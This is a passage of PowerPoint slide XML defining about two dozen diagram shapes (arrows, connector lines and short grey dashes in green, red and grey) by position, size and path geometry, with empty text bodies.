            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="535305">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="534798" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="007F00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4121430" y="2067543"/>
            <a:ext cx="153519" cy="101926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="77469" h="51434">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="51058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77377" y="25266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="007F00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="object 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5161396" y="2117611"/>
            <a:ext cx="2539348" cy="445455"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1281429" h="224790">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="373201" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373201" y="224236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1281201" y="224236"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="007F00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="object 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7670040" y="2510858"/>
            <a:ext cx="153519" cy="103183"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="77470" h="52069">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="51584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76851" y="25792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="007F00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="object 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787582" y="2117611"/>
            <a:ext cx="913559" cy="445455"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="461010" h="224790">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="224236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="460579" y="224236"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="007F00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="object 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7670040" y="2510858"/>
            <a:ext cx="153519" cy="103183"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="77470" h="52069">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="51584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76851" y="25792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="007F00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="object 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6344266" y="2561969"/>
            <a:ext cx="1356500" cy="1035621"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="684529" h="522605">
                <a:moveTo>
                  <a:pt x="0" y="522165"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="684289" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="007F00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="object 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7670040" y="2510858"/>
            <a:ext cx="153519" cy="103183"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="77470" h="52069">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="51584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76851" y="25792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="007F00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="object 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8118571" y="2857165"/>
            <a:ext cx="0" cy="616591"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="311150">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="311088"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="007F00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="object 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8067459" y="3443385"/>
            <a:ext cx="103183" cy="153519"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="52070" h="77469">
                <a:moveTo>
                  <a:pt x="51584" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25792" y="77377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51584" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="007F00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="object 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5284481" y="5369982"/>
            <a:ext cx="765076" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="386080">
                <a:moveTo>
                  <a:pt x="385834" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="object 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5161396" y="5319915"/>
            <a:ext cx="153519" cy="101926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="77469" h="51435">
                <a:moveTo>
                  <a:pt x="77377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="25266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77377" y="51058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77377" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="object 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6344266" y="4325845"/>
            <a:ext cx="0" cy="627916"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="316864">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="316352"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="object 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293156" y="4921451"/>
            <a:ext cx="103183" cy="153519"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="52069" h="77469">
                <a:moveTo>
                  <a:pt x="51584" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25792" y="77377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51584" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="object 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3213937" y="5369982"/>
            <a:ext cx="1062046" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="535939">
                <a:moveTo>
                  <a:pt x="535325" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="object 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3091894" y="5319915"/>
            <a:ext cx="153519" cy="101926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="77469" h="51435">
                <a:moveTo>
                  <a:pt x="77377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="25266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77377" y="51058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77377" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="object 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1439631" y="5369982"/>
            <a:ext cx="760043" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="383540">
                <a:moveTo>
                  <a:pt x="383202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="object 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317589" y="5319915"/>
            <a:ext cx="153519" cy="101926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="77470" h="51435">
                <a:moveTo>
                  <a:pt x="77377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="25266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77377" y="51058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77377" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="object 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2645451" y="4335232"/>
            <a:ext cx="3775" cy="617849"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="311785">
                <a:moveTo>
                  <a:pt x="1579" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1579" y="149491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="149491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="311615"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="object 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2594338" y="4921451"/>
            <a:ext cx="103183" cy="153519"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="52069" h="77469">
                <a:moveTo>
                  <a:pt x="51584" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25792" y="77377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51584" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="object 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578036" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59054">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="object 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="811689" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59054">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="object 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044299" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59054">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="object 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277951" y="3891916"/>
            <a:ext cx="115766" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="58420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58427" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="object 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510562" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59055">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="object 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1743174" y="3891916"/>
            <a:ext cx="117026" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="59055">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58954" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30003">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="object 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762547" y="4428068"/>
